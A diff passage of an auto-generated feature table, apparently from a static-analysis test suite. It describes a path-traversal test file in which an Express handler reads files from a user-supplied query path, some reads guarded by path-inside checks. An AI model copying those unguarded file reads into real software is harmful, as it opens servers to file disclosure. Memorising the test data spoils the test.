contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:304:5:304:16 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:304:5:304:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:304:5:304:16 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:304:5:304:16 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:304:5:304:16 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | calleeImports | fs | @@ -9309,6 +77742,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:304:18:304:21 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:17 | isPathInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:17 | isPathInside | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:17 | isPathInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:17 | isPathInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:17 | isPathInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | exceptional return of isPathI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | exceptional return of isPathI ... , SAFE) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | exceptional return of isPathI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | exceptional return of isPathI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | exceptional return of isPathI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | isPathI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | isPathI ... , SAFE) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | isPathI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | isPathI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:305:6:305:29 | isPathI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:306:3:306:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:306:6:306:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:306:6:306:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:306:6:306:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:306:6:306:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:306:6:306:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | calleeImports | fs | @@ -9318,6 +77791,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:306:19:306:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:309:3:309:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:309:6:309:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:309:6:309:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:309:6:309:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:309:6:309:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:309:6:309:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | calleeImports | fs | @@ -9327,6 +77825,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:309:19:309:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:17 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:17 | pathIsInside | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:17 | pathIsInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:17 | pathIsInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:17 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | exceptional return of pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | exceptional return of pathIsI ... , SAFE) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | exceptional return of pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | exceptional return of pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | pathIsI ... , SAFE) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | pathIsI ... , SAFE) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | pathIsI ... , SAFE) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | pathIsI ... , SAFE) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:312:6:312:29 | pathIsI ... , SAFE) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:312:19:312:22 | path | CalleeFlexibleAccessPath | pathIsInside | | autogenerated/TaintedPath/normalizedPaths.js:312:19:312:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:312:19:312:22 | path | calleeImports | path-is-inside | @@ -9343,6 +77856,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:312:25:312:28 | SAFE | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | | autogenerated/TaintedPath/normalizedPaths.js:312:25:312:28 | SAFE | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:312:25:312:28 | SAFE | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:313:3:313:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:313:6:313:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:313:6:313:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:313:6:313:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:313:6:313:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:313:6:313:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | calleeImports | fs | @@ -9352,6 +77890,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:313:19:313:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:316:3:316:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path 